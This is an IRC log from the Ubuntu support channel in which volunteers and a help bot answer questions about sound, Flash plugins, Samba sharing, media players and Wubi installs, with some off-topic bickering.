ubottuSo, you wanted to lure me into saying I don't know anything about anything? Yeah, that would be funny, of course. Now leave me alone.20:39
kuntauquestion: why when I plug my headphone the speaker still functioning20:39
_pg_Pici: ;)20:39
Pici_pg_: Please stop playing with the bot.   If you want to investigate, /msg ubottu whatever20:39
ubottuHi! I'm #ubuntu's favorite infobot, you can search my brain yourself at http://ubottu.com/factoids.cgi - Usage info: http://wiki.ubuntu.com/IRC/Bots20:39
ubottuPlease investigate with me only with "/msg ubottu Bot" or in #ubuntu-bots.  Search for factoids with "/msg ubottu !search factoid".20:40
ziggy_kuntau: that particular plug doesn't know that you've plugged in20:40
ziggy_kuntau: have you tried experimenting with the other plugs on your audio card/device?20:41
Guest54152linux help just let me know20:41
kuntaustill can't20:41
kuntauit supposed to mute the speaker right20:42
micaelHello i have the new ubuntu and i have a windows server is there any good program that i can use like itunes20:42
ziggy_kuntau: yeah20:42
kuntauwhere can i find the setting20:42
ziggy_kuntau: I had the same problem when I first installed20:42
zkriessemicael: nothing will be the same as iTunes for you...But you can use Rythmbox20:42
kuntauwhat do u do then20:42
vltmicael: For basic tasks: Rhythmbox20:42
pLrkuntau: alsamixer20:42
belisariusI need help, what do I need to do to get it?20:43
vltmicael: More advanced but a little confusing: Amarok20:43
pLrbelisarius: just ask20:43
kuntaupLr: thx20:43
belisariusI did20:43
belisariusI'm not getting any sound output from my audigy 2 zs under 10.4. Onboard soundchip is disabled in bios and I already tried to change the mixer settings of the alsamixer in the terminal without any effect. Can anyone please help me?20:43
DevrethmanBanshee is pretty itunes-esque IRRC20:43
ziggy_kuntau: I tried using the other plugs (S/PDIF) I think it is called20:43
micaelzkriesse and vlt Rythmbox i can just see music no vids20:43
belisariushere the terminal output http://paste.ubuntu.com/449808/20:43
zkriessemicael: well i'm sorry but the choices are limited for iPod stuff20:44
pLrbelisarius: i need to look it up for u on google :/ 1 sec20:45
micaelzkriesse not for Ipod only have the same like itunes20:45
vltmicael: You're free to write an app just like iTunes ;-)20:45
zkriessemicael: Ok are you saying you want to watch movies?20:45
micaelvlt :)20:46
micaelzkriesse yes and all the stuff i have in my server20:46
vltmicael: "vlc" is a very good video player (for single files)20:46
ubottuAudio (Ogg, MP3...) players: Audacious, Banshee, Beep Media Player, Listen, Quod Libet, Rhythmbox, Exaile, XMMS2 (GTK/Gnome based) and Amarok, JuK (Qt/KDE based).  Video players: Totem, Xine, MPlayer, VLC, Kaffeine - See also !codecs20:47
telephonewhy is 64bit ubuntu not recommended for dayly desktop use??20:47
Guest54152telephone, its bad20:47
telephonewhy is 64bit ubuntu bad??20:47
Guest54152telephone, not compatible with progrms20:47
=== simar_mohaar is now known as simar
Erixno flash :)20:47
DaekdroomSpends too much RAM20:47
pLrbelisarius:  are you using alsa? do u still have pulseaudio?20:48
SlidingHorntelephone: it's not very actively developed as compared to the x86 versions, as not many people use it (according to ubuntu's explanation)20:48
ziggy_telephone: I use 9.10 64-bit20:48
Ziphilterix, yes there is flash20:48
=== emc_ is now known as emc
dagit's good if you need making 3d, or you don't need20:48
pLrtelephone: its not bad its unstable cuz most ppl dont have it so no bug reports :920:48
Guest54152dag, how do you make 3d20:48
ziggy_telephone: as for flash, just make sure to use the 64-bit BETA release; much more stable that using the 32-bit edition20:49
telephoneI currently have 64 bit gentoo, but want better powerusage for my laptop. Hence I wanted to use ubuntu as base system.20:49
kuntauziggy_: installed alsa then what do i do20:49
dagguest54152 : blender20:49
Guest54152dag, k cool20:49
Guest54152telephone, why do you want 6420:49
k-radis awn not too bad of those docks of the ones that are out there ?  its an older one, i haven't kept up with the newer ones, i'm hoping i'm not missing one thats tons better20:49
belisariuspLr: I don't think that I have pulseaudio, but I'm new to ubuntu, so I can't say for sure20:50
SlidingHornk-rad: there are lots of good dock apps out there....take a look @ awn, cairo, wbar, & simdock20:50
ziggy_kuntau: I think that was pLr's suggestion about alsamixer20:50
DarkStar1k-rad: I use Cairo. It's not failed me yet20:50
telephonebecause I have a 64bit system.20:50
k-radSlidingHorn, between Cairo and AWN, which would you choose ?20:50
k-radDarkStar1, is it fully featured ?20:50
seb_hello can someone help me with my wireless internet connection20:51
Guest54152telephone, use 3220:51
pLrbelisarius: yea u probably do.. a lot of the stuff in your pastebin is old..20:51
seb_it dosn't seem to be installed20:51
oCean_telephone: you can perfectly use 64 bit, as long as your processor is capable20:51
uggisguys, what you would choose; openGL or directX?20:51
ziggy_telephone: I've got no information sources about the power usage profile of ubuntu 64-bit20:51
Guest54152ocean nah20:52
belisariuspLr: And what can I do to change that?20:52
pLrbelisarius:  http://www.google.com/search?client=ubuntu&channel=fs&q=sb+audigy+2+ubuntu20:52
SlidingHornk-rad: never tried cairo...had some issues with awn -- the only one i have real experience with and didn't have problems with was wbar...but I didn't really extensively research any of them20:52
DarkStar1k-rad: I haven't tried awn but tbh cairo I haven't had any issues with cairo since Lucid20:52
oCean_Guest54152: yes. Don't tell lies20:52
Guest54152ocean5, dude20:52
=== XFGolden is now known as XFGoldenBBL
telephoneubuntu seems to have changed. So what is the difference between "desktop" and "notebook"  downloads?20:52
Guest54152ocean5, nah20:52
oCean_Guest54152: telephone full supported, all apps in the repositories. No need to worry20:52
pLrbelisarius: you can remove pulseaudio by "apt-get remove pulseaudio"20:52
pLrbelisarius: but read online before you act20:53
kuntaupLr: what option to check in alsa20:53
Guest54152ocean5, nah20:53
belisariusWill do so, thank you20:53
=== Trek is now known as CaptainTrek
telephoneI do not want a heavyweight system, I mostly want a laptop with long battery life, and then programming.20:53
Guest54152no flash20:54
telephone...battery duration time...20:54
kuntaui try some but still doestn change anything20:54
oCean_Guest54152: don't lie20:54
Guest54152occy, y20:54
craigbass1976I'm having a smidgen of trouble...  WHat are the packages I need to run a samba server?20:54
SlidingHorntelephone: if that's the case then why are you trying to get 64-bit?  you should be well served with a 32-bit system20:54
dagtelephone; +120:54
SlidingHorn!samba | craigbass197620:54
ubottucraigbass1976: Samba is the way to cooperate with Windows environments. Links with more info: https://wiki.ubuntu.com/MountWindowsSharesPermanently and https://help.ubuntu.com/10.04/serverguide/C/windows-networking.html - Samba can be administered via the web with SWAT.20:54
vltcraigbass1976: "samba" should do it20:54
ziggy_telephone: I think that battery life would be a funtion of your usage patterns20:54
=== CaptainTrek is now known as TrekBot
Guest54152SlidingHorn, telephone yeah20:54
=== TrekBot is now known as CaptainTrek
pLrkuntau: open a shell run alsamixer20:55
Guest54152ocean5, y20:55
ziggy_telephone: as long as you don't use power-gulching processes (3d rendering, 3d games, HD video playback, etc.) you should be OK20:55
pLrtelephone: use powertop..20:55
kuntaui did.. but then?20:55
craigbass1976vlt, I already have the newest version, copied my old smb.conf over, and no love.  I do remember windows having trouble "checking again" for new servers though... That could be the trouble20:55
kuntaui tick headphone and nothing20:55
=== gent_away is now known as gent
rhello. i installed the latest adobe-flashplugin and fixed the links but now it turns out to be silent. it does not play sound. how can i fix this? why doesn't adobe fix this? since the problem seems to be around since version 9..20:56
Guest54152oCean_, y20:56
pLrkuntau: use the arrow keys.. or run man alsamixer20:56
vltcraigbass1976: What's the problem?20:56
telephoneI actually have a older (9.?) installation CD. Can I use this to install the newest version?20:56
oCean_Guest54152: Are you able to make complete sentences?20:56
Guest54152oCean_, yeah u?20:56
telephoneOr do I have to download one of "desktop", "notebook"?20:57
antonpiatekI want to extract a single file from a source package - anyone know a good way to do this (is it possible without unpacking the whole source?)20:57
craigbass1976vlt, doesn't show up fo rthe windows boxes.  It doesn't show up even in "view workgroup computers"20:57
rno sound after adobe flash upgrade - how to fix this?20:57
dagtelephone: new download20:57
telephonedag: roger that20:57
ready2screamHello, could I get some help with Samba, connecting from Windows XP to Ubuntu ?20:57
vltcraigbass1976: What does `netstat -tulpen | grep :445` look like?20:58
craigbass1976vlt, tcp        0      0   *               LISTEN      0          241436      -20:58
SlidingHornr: what browser are you using?  you had sound before this "upgrade"?  what version did you upgrade from/to?20:58
magnetron!ask | ready2scream20:58
ubottuready2scream: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-)20:58
vltcraigbass1976: Ok, it's running and listening20:59
Guest54152ready2scream, sure20:59
rSlidingHorn: had the flash 9 from the repo on hardy. upgraded to the latest stable from adobe. had fine sound before.20:59
ready2screamthank you> i wasn't sure if this was the correct chat room, etc.20:59
craigbass1976vlt, I just have to wait for XP to dummy up then?20:59
=== rinzai_afk is now known as rinzai
ziggy_telephone: you can install 9.x and upgrade from that, but you'll be downloading a couple of GBs I imagine20:59
vltcraigbass1976: What error message do you get when you connect to "//<yourip>/"?20:59
craigbass1976vlt, in what, explorer?\21:00
ready2screamhow can I view what my samba account & pwd is on the ubuntu srvr, i..e what is the command?21:00
vltcraigbass1976: In your client, yes.21:00
rSlidingHorn: i fixed the update-alternative links to the plugins.. flash works.. plays videos and so on. but no sound.21:00
JPPready2scream, I dont think you can view stored samba passwords as they are encoded21:01
alan__aguem fala portugues21:01
vlt!pt | alan__21:01
oCean_!pt | alan__21:01
ubottualan__: Por favor, use #ubuntu-br para ajuda em português. Para a comunidade local portuguêsa, #ubuntu-pt. Obrigado.21:01
latedoes anyone own a dell precision m4400?21:01
SlidingHornr: are you using chrome?  I had this problem with chrome, and was fixed by switching to chromium --  dont know how relevant that may be to you21:02
vlt!anyone | late21:02
ubottulate: A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?21:02
craigbass1976vlt, keeps firing up firefox21:02
Guest54152if you need ubuntu help let me know21:02
miazgatorI really like gnome desktop but KDE is superior to it in flashplayer handling, because gnome has some bug, anybody experiencing that as well?21:02
rSlidingHorn: not very. firefox. well, is chromium worth a try? who maintains it and isn't there a way to fix this with some simple tweaks?21:03
SlidingHornmiazgator: no clue what bug you're talking about...I haven't seen this in my experience or in anything I've read -- where are you getting this information?21:03
lateso i have dell m4400 and i installed ubuntu and im dualbooting it with win 721:03
vltcraigbass1976: Try "\\192.168....\" instead (backslash instead of forward, assuming you have a 192.168.* IP address)21:03
lateand i have one very annoying problem that sometimes i boot in ubuntu, ubuntu doesnt recognize wifi card..21:04
craigbass1976vlt, gah... forgot about that / \21:04
simarsimar: hi21:04
latethen i need to boot to win 721:04
lateand again back to ubuntu to get it work..21:04
miazgatorSlidingHorn: In Kubuntu my flashplayer behaves perfectly smooth on fullscreen and when scrolling pages with flash contents what my Ubuntu installation doesn't and never was doing good21:04
duffydack!swap > duffydack21:05
ubottuduffydack, please see my private message21:05
dotnettedhey all - I've just botched my MySQL-Server-5.1 installation and can't seem to get the package to remove fully so that I can start again from scratch - every way I try to remove the package results in the process hanging - "dpkg -r mysql-server-5.1", "apt-get remove mysql-server-5.1" and via the GUI - I've tried purging with no luck21:05
miazgatorSlidingHorn: and that is on many computers, not only mine21:05
vlt!pt | alan__21:06
ubottualan__: Por favor, use #ubuntu-br para ajuda em português. Para a comunidade local portuguêsa, #ubuntu-pt. Obrigado.21:06
rno sound with flash 10. who knows a remedy? it's not pulseaudio!21:06
ShapeShifter499I was looking around my dell inspiron 2500 laptop and found it has a ActionTec PCI modem...................I'll never use it because I'm turning this computer into a server, but is there something I can buy and plug into that slot to make my computer faster?21:06
belisariuspLr: I still have no sound.21:07
SlidingHornr: I'm @ work so I can't really dig deep into this, but just googling the terms: ubuntu flash 10 no sound -- returned quite a few possibly promising results21:07
ziggy_r: have you tried upgrading flash to 10.1 (be advised that it is--last time I checked-- was in BETA)21:08
rSlidingHorn: but most just are about version 9 or about removing pulseaudio. none of which work for me. i don't have pulseaudio. just alsa.21:08
miazgatorziggy_: I've just downloaded a stable release from the adobe website21:08
=== simar is now known as simar_busy
ziggy_r: are you running 64-bit or 32-bit ubuntu?21:08
miazgatorziggy_: I mean yesterday21:08
rziggy_: could give it a try.21:09
SlidingHornmiazgator: didn't mean to insinuate that you were incorrect - just wanted to get some background on what you were saying :)21:09
rziggy_: 32. there is no 64-bit flash afaik21:09
radobe: you are listening? :)21:09
pLrbelisarius: many ppl have your sound card you should check the link i put..21:09
vltShapeShifter499: There are entire computers completely running on a single PCI card ;-)21:09
pLrbelisarius:  http://www.google.com/search?client=ubuntu&channel=fs&q=sb+audigy+2+ubuntu21:09
ShapeShifter499vlt: lol really??21:10
vltShapeShifter499: Yes :)21:10
ziggy_r: I'm running 64-bit, and had the 32-bit flash player. Experienced memory leaks and loss of sound. All that went away when I tried using the 64-bit BETA release of flash 10.121:10
Ginbun2I installed kubuntu-desktop. how do I change kdm back to gdm?21:10
ShapeShifter499vlt: can u point me to a link?21:11
belisariusI installed alsamixergui and it shows me the audio chip of my ATi 5870 as sound card.21:12
ziggy_r: As you're running on 32-bit, i would suggest ensuring that you have the latest release. AFAIK, the repositories don't usually carry the latest releases.21:12
vltShapeShifter499: I'd have to google too. And it's nothing you really want for your old machine. It's cheaper to just buy a decent new machine.21:12
tic^r: i'm running the 64-bit flash. no problems for me with it.21:12
ziggy_r: you may need to manually install from a package21:13
belisariusI have looked through the google records, but I don't seem to find a solution. pLr21:13
pLrbelisarius: dont use the gui21:13
pLrbelisarius: i had that issue already..21:13
ShapeShifter499vlt: cheepo server =D21:13
pLrbelisarius: you have to enable the digital output jack21:13
lateanyone can help me with my wifi peroblem?21:13
ShapeShifter499vlt: I saved this computer from going to e-waste21:13
pLrbelisarius: but in 10.04 they changed the sound controls u can do it w/ alsamixer21:14
hopeless8009Im trying to back up my DVD collection i want to make images of the DVDs can anyone point me to a program i can use21:14
tic^!wifi | late21:14
ubottulate: Wireless documentation, including how-to guides and troubleshooting information, can be found at https://help.ubuntu.com/community/WifiDocs21:14
pLrbelisarius: let me see if there's something stable out now.. i use intel-hda now21:14
vltShapeShifter499: There's only one better thing than much, much RAM for fast computers:21:15
pLrbelisarius: http://www.linuxquestions.org/questions/ubuntu-63/sound-blaster-audigy-2-zs-337513/21:15
vltShapeShifter499: Even more RAM21:15
rziggy_, tic^ the file i get following the links to the beta are not different to the file i already have. either they just don't have a 10.1 or they already put that out. just see solaris, android and windows links besides those.21:15
pLrbelisarius: read and try it all21:16
hiexpolast night i thpught i would be smart and installed wicd network manager well of coarse it  removes network manager gnome what a mistake that was  wicd is a bucket of bolts and i had to come to another machine and find a deb package to reinstall network manager21:16
vlthopeless8009: dvdbackup21:16
=== afiefh is now known as afief
craigbass1976vlt, I am able to see it via //192....   It just doesn't show up yet in the list on network neighborhood21:16
craigbass1976I mean \\192...21:17
tic^r: adobe links for 64-bit flash?21:17
hiexpoo hand everyone getdeb karmic is back up21:17
rtic^: 32 bit21:17
ubottuCe canal est en anglais uniquement. Si vous avez besoin d'aide ou voulez discuter en francais, merci de rejoindre #ubuntu-fr, ou #ubuntu-qc. Merci.21:17
belisariusthx pLr21:18
pLrbelisarius: np21:18
rtic^: and what does adobe mean by.. 'GM'?21:18
vltcraigbass1976: I'm afraid I can't help much there. Check any firewalls and look for samba options containing "*browse*" ... good luck21:18
pLrbelisarius: http://www.google.com/search?hl=en&q=sb+audigy+2+ubuntu+no+sound21:18
tic^r: i downloaded 64-bit flash from adobe, it is in beta. but i have not had any problems with it. (at least me anyway. can't speak for everyone that uses it).21:18
pLrbelisarius: easy google :D21:18
ziggy_r: you went here, right? http://get.adobe.com/flashplayer/21:18
ALBASLguys .. how can i install a new login screen21:18
hopeless8009vlt: what is that21:19
vlthopeless8009: The tool you were looking for. Just install it from your packet manager21:19
craigbass1976vlt, and take a hammer to the windows boxes?21:19
ziggy_r: I concur with tic^21:19
Ginbun2I installed kubuntu-desktop. how do I change kdm back to gdm?21:19
hopeless8009i installed it with terminal but its real small is that right21:19
tic^r: i dont remeber the exact link i used. i googled 64bit adobe flash and downloaded it.21:20
rziggy_: but that just links to the url you posted21:20
vlthopeless8009: Yes21:20
Guest54152ubuntu help just let me know21:20
hopeless8009i dont see it in my list of programs21:20
rtic^: they don't provide the link. can't find it.21:20
sebsebsebALBASL: hi21:20
sebsebsebALBASL: thats easy to do21:20
vlthopeless8009: You run it from cmd line21:20
hopeless8009vlt: is it an add on to a program i alrady have21:20
tic^r: hangon, let me try.21:20
hopeless8009oh ok21:21
ziggy_r: Umm, I didn't post a link prior to this one: http://get.adobe.com/flashplayer/21:21
Ginbun21 - 1 :+21:21
Guest54152there is no flash 64 anymore21:21
sebsebsebALBASL: and theres choice,  KDM :)  LXDM, XDM, and Slim21:21
timposeyIs there a program with ubuntu that could be used by a human translator which would pull up a pdf or jpg document on the left side of the screen and allow a person to type the translation into a window on the right side or something similar.21:21
ShapeShifter499vlt: I wonder if I can use this..... http://en.wikipedia.org/wiki/I-RAM21:21
ALBASLsebsebseb: hi ...21:21
Guest54152guys there is no flash 6421:21
rziggy_, tic^ how will i know if the 64bit version would run at all? which arch is sufficient?21:22
VkecI still need help in connecting a windows computer to a linux printer21:22
Guest54152SEE THIS LINK http://www.theregister.co.uk/2010/06/11/64_bit_flash_for_linux_dead/21:22
Guest54152r, there is no flash 6421:22
tic^r: try here--> http://get.adobe.com/flashplayer/21:22
vlthopeless8009: For some DVDs you _might_ need a "lib" for the "dvd" to parse the "css" structure.21:22
Guest54152r, SEE THIS LINK http://www.theregister.co.uk/2010/06/11/64_bit_flash_for_linux_dead/21:22
ALBASLsebsebseb: i just downloaded a login screen from gnome site and i dont know how to install it21:22
pLrGuest54152: there is21:22
rGuest54152: i know21:23
celeritasjust finished setting up hamachi for synergy on ubuntu and mac21:23
Guest54152pLr, SEE THIS LINK http://www.theregister.co.uk/2010/06/11/64_bit_flash_for_linux_dead/21:23
oCean_Guest54152: stop apmming21:23
ziggy_r: are you running ubuntu 64-bit or 32-bit?21:23
Guest54152oCean_, no u21:23
tic^r: thats the one i downloaded, make sure you click on the link for PC'S21:23
sebsebsebALBASL: KDM is good,  Slim is ok, Debian theme by default if installing from Ubuntu repo, since Ubuntu is based on Debian,  its very customizable, easy to theme, some themes on website, could even make your own21:23
DaekdroomGuest54152, there still is a 64bit version, it only won't get updated.21:23
tic^r: 64bit version 10.1 beta21:23
sebsebsebALBASL: what you downloaded was probably for the old log in screen that Ubuntu was using before 9.10, GDM21:23
ALBASLsebsebseb: its GDM.tar.gz21:23
hopeless8009vlt would it be possable for you to help me with the command to copy the DVD to image21:23
pLrGuest54152:  see the link i put?21:23
sebsebsebALBASL: as of 9.10 it uses GDM 2 instead, which sucks,  you can change the background on it with some program, and thats about it21:23
AnxiousNutIs there a way to autohide an app? lol, i know, but would be awesome!!!21:24
rright now i wish the world would already be flash free and html5 and just me, the browser and a fine codec..21:24
vlthopeless8009: Have you even tried to run the command?21:24
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ziggy_tic^: r is running 32-bit, he won't be able to run 64-bit software21:24
pLrhtml5 is a joke r u for real lol21:24
Guest54152pLr, that is old link21:24
hopeless8009vlt: not yet now but im better at it if someone shows me21:24
sebsebsebALBASL: the old GDM is actsaully in the repo, but its not as simple as just installing and using, so may as well go with one of the alternatives I mentioned :)21:24
* Vkec shoots himself in the face21:25
galerienr if there was only one thing out there, that would be a disaster21:25
ALBASLsebsebseb: aha... so KDM is better21:25
SerraphynCan someone help me, ubuntu wont see wide screen resolution on my widescreen monitor, It does 1440x900 and I'm stuck 1360x76821:25
pLrGuest54152: it was posted this week.. its a very new link http://blog.mattrudge.net/2010/05/03/installing-flash-player-on-ubuntu-10-04-64-bit/21:25
sebsebsebpLr: HTML 5 is good21:25
pLrdo u understand?21:25
rgalerien: which one are you refering to?21:25
tic^ziggy_: oh, sorry, through he needed 64bit.21:25
ubottu#ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!21:25
rgalerien: of course there must be some free codecs also!21:25
sebsebsebALBASL: which version you on 10.04?21:25
ziggy_r: so can you lookup the version number of the flash player that is installed on your computer?21:25
pLrsebsebseb: i know i was just looking for ppl i wanna talk to21:25
rziggy_: command?21:26
sebsebsebpLr: #ubuntu-offtopic21:26
ALBASLsebsebseb: yes 10.0421:26
LjLpLr: this is not a social channel, please try #ubuntu-offtopic instead21:26
axisyshow do I make a deb pkg for ubuntu ? is there a quick start quide somewhere ?21:26
ShapeShifter499vlt: could i-ram be modded to plug into my comp?21:26
LjL!packaging > axisys    (axisys, see the private message from ubottu)21:26
pLrLjL: im really not new here..21:26
pLrsebsebseb: didnt know about that 1 thx21:26
rziggy_: 10.1 r53 :)21:26
LjLpLr: ok, then you should already know about the rules.21:26
Guest54152Daekdroom, the flash 64 is dead21:26
sebsebsebALBASL: with 9.10 KDM gets this uhmm  blue circle type theme by default, with 10.04, it gets a even nicer theme by default21:27
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galerienr : anything... If there was only linux, or ubuntu, yes, I'd like that, but without mac and windows, no one would like to overcome the other with new products and creativity and...21:27
DaekdroomGuest54152, it's just not getting updated for now. It doesn't mean one can't use it.,21:27
rziggy_: so the 10.1 version is already the normal version they release for linux. and it does NOT work for me21:27
LjLDaekdroom: actually, it doesn't seem like i can download it at all.21:27
axisysLjL: thanks21:27
LjLDaekdroom: http://labs.adobe.com/downloads/flashplayer10_64bit.html21:27
pLrLjL: k well continue w/ the ppl im dropping now21:27
Guest54152Daekdroom, HA!21:27
sebsebsebALBASL: as for themeing I am not sure how to do that, but I guess it can be done.  Slim is worth finding out about really as well on its website.21:27
odtmy ubuntu wubi installation doesn't boot anymore. i'm running a live cd at the moment, did try to fsck the root.disk but still get a kernel panic when trying to boot.21:28
rwho needs flash on linux 64-bits..21:28
DaekdroomGuest54152, it doesn't mean you can't get it from, let's say, ubuntu's repo21:28
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ziggy_r: hmmm, I remember when I first installed/updated flash it was going bonkers. It all cleared up after a restart.21:28
VkecI still need help in connecting a windows computer to a linux printer21:28
ryou gotta love adobe21:28
LjLDaekdroom: is it there?21:28
DaekdroomLjL, maybe. Haven't checked.21:28
Vkeccan anyone help21:28
LjLDaekdroom: i don't think it's legal to redistribute it.21:28
sebsebseb!cups | Vkec21:28
ubottuVkec: Printing in Ubuntu is done with cups. See https://help.ubuntu.com/community/Printers - https://wiki.ubuntu.com/HardwareSupportComponentsPrinters - http://linuxprinting.org - Printer sharing: https://wiki.ubuntu.com/NetworkPrintingFromWindows21:28
rziggy_: so you are suggesting that it may magically just work after a reboot?21:28
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rziggy_: that would be a nice feature..21:28
ziggy_r: I'm only recounting my own personal experience (^_^)21:29
VkecOh yeah i tried what it said and it didn't work Windows still couldn't find the printer21:29
rziggy_: :)21:29
m4rku5hey, I cant seem to install globus - I have the same error as stated in this post - http://article.gmane.org/gmane.comp.clustering.globus.user/5332, - when trying to intall Compress::Zlib on 10.04 server with cpan i get an error that tests failed and it wont run make install21:29
ALBASLsebsebseb: aha .... thanks bro21:29
rwell, thanks for now. we know more about flash.. but not yet how to fix such little issues..21:30
sebsebsebALBASL: I guess #kubuntu  can help you theme KDM, if you end up, doing that21:30
LaMuerteBlancasth nice to see?21:30
ziggy_r: When did the problem start?21:31
JackStonerhey need help with kde4, everytime i launch vlc, it opens another weird window with no description, any ideas??21:31
galerienr : no offence, but some people are macfan, considering that anything without an apple on it is crap, and you are like a freefan, or call it what you want...21:31
ubottu#ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!21:31
galerienLjL : ok, sorry, I'm not saying anything else about this21:31
odtany ideas what to try to fix a borken wubi install, besides fsck the disk file?21:31
sebsebsebodt: have you got data in there?21:32
odtsebsebseb: yeah, and I have mounted it fine using the livecd21:32
sebsebsebodt: mounted it fine using the Live CD?21:32
odtwell, can't be the disk images fault21:32
sebsebsebodt: Wubi is not a real partition, so  as far as I know you can't just access the data using Live CD21:32
odtsebsebseb: ofcourse, via loopback mount21:33
hagabakawhere is LIBGL_DRIVERS_PATH set?21:33
sebsebsebodt: ah ok21:33
odtfirst mount win partition, then the file21:33
rgalerien: and what are you then?21:33
sebsebsebodt: well why not, get data,  and then do a real partition instead?  better in the long run and that21:33
LjLr: please, let's drop this21:33
galerienr lets take that in /query, ok?21:33
rziggy_: just after i switched to the 10.121:33
odtsebsebseb: might just need to do that now ;)21:33
Njhis there any room that has programming help?21:33
rgalerien: go ahead21:33
LjLNjh: there is ##programming21:33
LjLNjh: there are also channels for some specific languages21:34
LjL!channels > njh    (njh, see the private message from ubottu)21:34
NjhLjL: do you know the one for c?21:34
LjLNjh: ##c21:34
rLjL: drop what?21:34
NjhLjL: thanks21:34
LjLr: the personal issues with galerien, it's best to take them to a query if you have to21:34
galerienLjL that's what we are doing21:35
LjLgalerien: cool21:35
rLjL: why, is he known for such things? i have no issues. just curious what he wants to tell21:35
LjLr: not known to me, at any rate - it's just that this channel should be kept about Ubuntu support only21:36
guntbertr the whole conversation is off topic for a support channel21:36
h00kPlease move on :) Thanks.21:36
AdolaAre SSD's plug-n-play on ubuntu?21:37
h00kAdola: yep21:37
wadHas anyone been able to get glipper running in 10.04?21:37
wadI've installed it, but the usage documentation doesn't make sense. I think it's out-dated.21:37
rwell, the software that makes up ubuntu is quite the right topic for this channel.21:37
Adolah00k: Sweet, thanks.  I was worried about drivers.21:38
alejandroAnybody with experience on toshiba laptops with alphanumeric keyboards?21:38
Robert_ZenzI've closed the lid of my Laptop (Nexoc S621II) and now my Intel Wireless stopped working. iwconfig recognizes it, iwlist scan shows no results and dmesg tells me that the link is not ready.21:38
anothernewbieIm new so can anyone name a website for quickly hosting terminal logs?21:38
vltwad: I just tried. The closest I got was `/usr/lib/glipper/glipiper -w`21:38
Robert_ZenzI've already rebooted, yes.21:38
Robert_Zenzanothernewbie, pastebin.com21:38
SlidingHorn!anyone | adola21:38
ubottuadola: A large amount of the first questions asked in this channel start with "Does anyone/anybody..."  Why not ask your next question (the real one) and find out?21:38
vltwad: glipper, even21:38
anothernewbiethank you google did not help much21:38
wadanothernewbie, I'll try that.21:38
h00kr: This is a Support channel, support is on-topic, anything else is not.21:39
rh00k: glad you told me21:39
belisariusOk, I have sound now, but when I turn it too loud I hear horrible scratching.21:39
h00kr: You're welcome.  Move on.  Thanks.21:39
craigbass1976belisarius, that's your eardrums.  Or bunk speakers perhaps21:39
AdolaSlidingHorn: ....Uh, Ok, that's super relevant to what I asked.21:39
hopeless8009vlt: i tryed to run the command and it returned "a shit load of errors and i need Css21:40
belisariusHeadphones, and I don't think that 80€ Sennheisers are that bad21:40
SlidingHornadola, my apologies...typed the wrong name!  :-\21:40
h00k!language | hopeless800921:40
ubottuhopeless8009: Please watch your language and topic to help keep this channel family friendly.21:40
AdolaSlidingHorn: Ok, sorry for being so rash.21:40
craigbass1976belisarius, what happens when you plug the speakers directly into an mp3 player or some such piece of equipment?21:40
belisariusNothing, they sound right.21:40
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belisariusno scratching or else21:41
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odthmm, looks like I cannot use LPVM from the livecd to transfer the wubi install to a free disk21:41
ziggy_r: you may find something useful here -> https://bugs.launchpad.net/ubuntu/+source/flashplugin-nonfree/+bug/54303521:41
craigbass1976belisarius, is the scratching like something is clipping (overdriven)?21:41
sebsebsebodt: uhmm there is a program not sure what it is called, that will let you convert a Wubi install into a partition, if it works21:41
sebsebsebodt: however probably better to just install from Live CD :)21:41
belisariusYes, and I hear a buzzing21:42
belisariusand I hear myself Oo21:42
justindisgustinI've been running Lucid NBE for a couple of months now, and suddenly I'm having issues loading gnome.  I get the message "There is a problem with the configuration server. (/usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256)21:43
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qgelHi, am i correct to assume that the purpose of the linux-headers is so i can build modules without the full linux-source?21:43
craigbass1976belisarius, you hear yourself?21:43
justindisgustinI searched using lynx on the forums but couldn't find anything that fixed my problem.21:43
_pg_are there tools that run on ubuntu but can be used to remove malware from windows? for like a live cd/usb?21:44
belisariusYeah, turned down the microphone in alsamixer and now it works21:44
guntbert!nickspam > _Pirate_Y00_H00_21:44
ubottu_Pirate_Y00_H00_, please see my private message21:44
micaelanyone knows if there is a program that i can see both music and vids like itunes on my server21:45
craigbass1976belisarius, I wonder if things were lopping back somehow and causing the overdrive.  I'm surprised you didn't get any kind of feedback if the crosstalk was that bad.21:45
qgel_pg: check out clamav21:45
craigbass1976_pg_, there's an AV (clamav maybe?) but I don't remember the detection rate being that high.  My favorite windows cleaner tool is the ubuntu installer.21:46
JackStonermicael, try banshee21:46
belisariusok, now I hear that scratching again21:46
justindisgustinanyone have any ideas?21:46
SlidingHorn!itunes | micael21:46
ubottumicael: itunes is not available on Linux, but there are many audio player alternatives (see !players). For Daap clients (sharing music with other iTunes clients on the network), install banshee21:46
vlt_pg_: There was a knoppix based distro called knoppicilin (or similar) from a German magazine. Google could help21:47
galerienand if you really, but like really, need Itunes, I guess you can run it on wine21:47
micaelJackStoner have tried it but is not working it is onlu seeing my mp321:47
_pg_sweet thanks chaps21:47
JackStonermicael, vlc??21:47
SlidingHorngalerien micael: there are a couple older versions that work partially in wine, but you won't be able to connect to the itunes store21:48
micaeljackstoner thanks but i am looking for a mix betwine acdsee and itunes21:48
slavik0329hey, how can i make a popup notification pop up in X from command line?21:49
galerienSlidingHorn: I've used it like 2 or 3 years ago for an Ipod... i don't know the current situation ;)21:49
justindisgustinanyone know what to do if I get "There is a problem with the configuration server. (/usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256)21:49
JackStonermicael, yw, but i think banshee should be pretty useful...have u tried getting the version from their website?21:49
micaelSlidingHorn i dont want itunes i want a program like that21:49
SlidingHornmicael: you can check the status of how things work with wine in its appDB - anything below a silver rating basically will mean you're not going to be able to work with it: http://appdb.winehq.org21:49
SlidingHornmicael: then I would recommend banshee21:49
vltslavik0329: For KDE there's knotify21:49
slavik0329vlt: and gnome?21:50
micaelthanks i will try banshee a bit more and try to get it to see my videos too21:50
JackStonerslavik0329, libnotify ...i think21:50
JackStonermicael, goodluck21:51
kthomas_vhwhat's the channel for dns/cname questions ?21:51
ikoniakthomas_vh: #dns21:51
* JackStoner goes to sleep 21:51
kthomas_vh:) thanks, duh.21:52
